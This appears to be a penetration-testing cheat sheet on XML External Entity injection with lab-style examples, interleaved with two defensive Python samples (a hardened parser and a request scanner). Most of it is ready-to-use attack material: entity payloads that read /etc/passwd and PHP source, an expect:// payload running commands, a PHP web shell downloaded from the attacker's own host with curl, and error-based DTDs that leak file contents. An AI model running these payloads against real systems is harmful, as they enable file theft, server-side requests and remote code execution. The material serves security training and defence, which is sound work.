XML External Entity (XXE) Injection: A vulnerability where unsanitized XML input from users is handed to an XML parser that still honours DTD entity declarations. By declaring entities, an attacker can make the parser read local files or issue network requests on the server's behalf, potentially disclosing sensitive data, reaching internal services, or degrading backend server performance through entity expansion.
Example XML Document:
XML (Extensible Markup Language): A markup language for data storage and transfer across applications.
Structure: XML documents are tree structures with elements:
Root Element: The primary container (e.g., <email>).
Child Elements: Nested data fields (e.g., <date>, <time>).
Tags: Surround elements (<tag>value</tag>).
Entities: XML variables that are expanded by the parser (e.g., the built-in &lt; expands to <).
Attributes: Optional settings within tags (e.g., version="1.0").
Identify every functionality that processes an XML structure.
Attempt to inject a % to cause an error.
Test for simple XXE injection and check if it is reflected.
Error-based XXE
Error-based XXE using DTD
Exfiltrate files
Remote command execution
If you cannot define the DOCTYPE, attempt XInclude XXE.
If the application has functionality to process XML via SVG (e.g., image upload), attempt XXE via SVG files.
If in scope, try a DoS attack.
XXE Attacks
Test Vulnerability
Character to attempt: '%'
Attempt to define an entity without referencing it and send the request to check whether the application blocks entity definitions (a parser that rejects the DOCTYPE errors out here, before any entity is referenced).
<!DOCTYPE test [
<!ENTITY xxe "Inlane Freight">
]>
<root>1</root>
Then reference the entity and check whether its value is reflected in the response.
<!DOCTYPE test [
<!ENTITY xxe "Inlane Freight">
]>
<root>&xxe;</root>
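The two probes above are what a hardened parser should refuse. As an added example (not code from the original page), the following stdlib-only Python parser is configured so that any DOCTYPE or entity declaration aborts parsing, which stops internal entities, SYSTEM entities, parameter entities and entity-expansion DoS at the same point; the sample documents are constructed from the probes shown above, and the element-to-text dictionary it returns is an assumption chosen for the example.

```python
import xml.parsers.expat as expat


class UnsafeXmlRejected(Exception):
    """Raised when a document tries to use DTD features that enable XXE."""


def parse_hardened(xml_bytes: bytes) -> dict:
    """Parse a small XML document with expat, refusing every DTD feature.

    Rejecting the DOCTYPE outright means no entity can ever be declared,
    so file reads, SSRF via SYSTEM entities and billion-laughs expansion
    are all impossible. Returns {tag: text} for elements carrying text.
    """
    parser = expat.ParserCreate()
    result: dict = {}
    buffers: list = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Exceptions raised inside a handler propagate out of Parse().
        raise UnsafeXmlRejected(f"DOCTYPE '{name}' is not accepted")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # Defence in depth: unreachable while DOCTYPEs are rejected.
        raise UnsafeXmlRejected(f"entity declaration '{name}' is not accepted")

    def external_entity_ref(context, base, sysid, pubid):
        # Returning 0 makes expat abort rather than fetch the resource.
        return 0

    def start_element(name, attrs):
        buffers.append([])

    def char_data(data):
        if buffers:
            buffers[-1].append(data)

    def end_element(name):
        text = "".join(buffers.pop()).strip()
        if text:
            result[name] = text

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(xml_bytes, True)
    return result


def is_accepted(xml_bytes: bytes) -> bool:
    """True when the document parses cleanly, False when it was rejected."""
    try:
        parse_hardened(xml_bytes)
    except (UnsafeXmlRejected, expat.ExpatError):
        return False
    return True


# Constructed sample documents mirroring the probes in the text.
BENIGN = b"<root>1</root>"
PROBE_UNREFERENCED = b"""<!DOCTYPE test [
<!ENTITY xxe "Inlane Freight">
]>
<root>1</root>"""
PROBE_REFERENCED = b"""<!DOCTYPE test [
<!ENTITY xxe "Inlane Freight">
]>
<root>&xxe;</root>"""
PROBE_EXTERNAL = b"""<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""

if __name__ == "__main__":
    samples = [("benign", BENIGN), ("unreferenced entity", PROBE_UNREFERENCED),
               ("referenced entity", PROBE_REFERENCED), ("external entity", PROBE_EXTERNAL)]
    for label, doc in samples:
        print(f"{label:20} -> {'accepted' if is_accepted(doc) else 'rejected'}")
```

Because the first probe (entity declared but never referenced) is rejected at the DOCTYPE, a tester following the checklist above sees an error on the very first request, which is the behaviour a defender wants to observe. The same idea applies to other stacks: disable DTD processing entirely (for example `disallow-doctype-decl` in Java SAX/DOM parsers, or `defusedxml` in Python) rather than trying to filter individual entity types.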
Reading Sensitive Files
Tip: In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
For PHP applications, the php://filter wrapper returns the target base64-encoded, so source files containing characters that would otherwise break the XML can still be read:
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<root>&xxe;</root>
Remote Code Execution with XXE
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Intrusionz3r0@htb[/htb]$ echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
Intrusionz3r0@htb[/htb]$ sudo python3 -m http.server 80
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
Note: We replaced all spaces in the above XML code with $IFS, to avoid breaking the XML syntax. Furthermore, many other characters like |, >, and { may break the code, so we should avoid using them.
Error Based XXE
Host a DTD file as follows:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
Payload Structure:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY % xxe SYSTEM "https://exploit-0ae100e704be4820817c4d9a011a00d1.exploit-server.net/exploit">%xxe;]>
<stockCheck>
<productId>1</productId>
<storeId>1</storeId>
</stockCheck>
Error Based using DTD file
Once a valid payload has been identified, either by brute forcing with Intruder or by scripting, the final payload is as follows:
We can copy the HTTP request from Burp and write it to a file for the tool to use. We should not include the full XML data, only the first line, and write XXEINJECT after it as a position locator for the tool.
POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.201.94
Content-Length: 169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://10.129.201.94
Referer: http://10.129.201.94/blind/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT
Note: Some web applications may default to a JSON format in HTTP requests but still accept other formats, including XML. So, even if a web app sends requests in JSON format, we can try changing the Content-Type header to application/xml and then convert the JSON data to XML with an . If the web application accepts the request with XML data, we can also test it for XXE, which may reveal an unanticipated XXE vulnerability.
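The content-type switch described in this note, together with the SVG upload and XInclude cases from the checklist, is something a defender can catch at the request layer. As an added example (not code from the original page), the following Python triage routine parses a raw HTTP request, enforces a per-endpoint allowlist of media types, and flags DTD and XInclude markers in any XML body; the endpoint paths, the `attacker.example` host and the sample requests are all constructed for this example.

```python
import re
from typing import Dict, List, Set, Tuple

# Markers that indicate DTD or XInclude processing is being requested.
INDICATORS = [
    ("DOCTYPE declaration", re.compile(r"<!DOCTYPE", re.I)),
    ("ENTITY declaration", re.compile(r"<!ENTITY", re.I)),
    ("external SYSTEM/PUBLIC identifier", re.compile(r"\b(SYSTEM|PUBLIC)\s+[\"']", re.I)),
    ("parameter entity reference", re.compile(r"%[A-Za-z_][\w.-]*;")),
    ("XInclude namespace", re.compile(r"2001/XInclude", re.I)),
]


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into method, path, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.decode("latin-1")


def media_type(content_type: str) -> str:
    """Strip parameters such as charset from a Content-Type value."""
    return content_type.split(";", 1)[0].strip().lower()


def looks_like_xml(ctype: str, body: str) -> bool:
    return ctype in ("application/xml", "text/xml") or ctype.endswith("+xml") \
        or body.lstrip().startswith("<")


def triage(raw: bytes, allowed: Dict[str, Set[str]]) -> List[str]:
    """Return findings for one request: allowlist violations first, then XML markers."""
    _method, path, headers, body = parse_request(raw)
    findings: List[str] = []
    ctype = media_type(headers.get("content-type", ""))
    if ctype not in allowed.get(path, set()):
        findings.append(f"content-type '{ctype}' not allowed for {path}")
    if looks_like_xml(ctype, body):
        for label, pattern in INDICATORS:
            if pattern.search(body):
                findings.append(label)
    return findings


# Hypothetical endpoint allowlist: a JSON API and an SVG upload endpoint.
ALLOWED = {"/api/stock": {"application/json"}, "/upload/avatar": {"image/svg+xml"}}

# Constructed requests. attacker.example is a placeholder host.
JSON_OK = (b"POST /api/stock HTTP/1.1\r\nHost: app.example\r\n"
           b"Content-Type: application/json\r\n\r\n"
           b'{"productId": 1, "storeId": 1}')
XML_SWITCH = (b"POST /api/stock HTTP/1.1\r\nHost: app.example\r\n"
              b"Content-Type: application/xml;charset=UTF-8\r\n\r\n"
              b'<?xml version="1.0"?>\r\n'
              b'<!DOCTYPE test [<!ENTITY % xxe SYSTEM "http://attacker.example/evil.dtd">%xxe;]>\r\n'
              b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>")
SVG_UPLOAD = (b"POST /upload/avatar HTTP/1.1\r\nHost: app.example\r\n"
              b"Content-Type: image/svg+xml\r\n\r\n"
              b'<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\r\n'
              b'<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>')

if __name__ == "__main__":
    for label, req in [("json", JSON_OK), ("xml switch", XML_SWITCH), ("svg", SVG_UPLOAD)]:
        print(label, triage(req, ALLOWED) or "clean")
```

The allowlist check is the decisive control for the JSON endpoint: the request is refused because of its media type before the body is ever handed to an XML parser. For the SVG endpoint the media type is legitimate, so the marker scan is what surfaces the DOCTYPE; it is a detection aid rather than a substitute for disabling DTD processing in the parser itself.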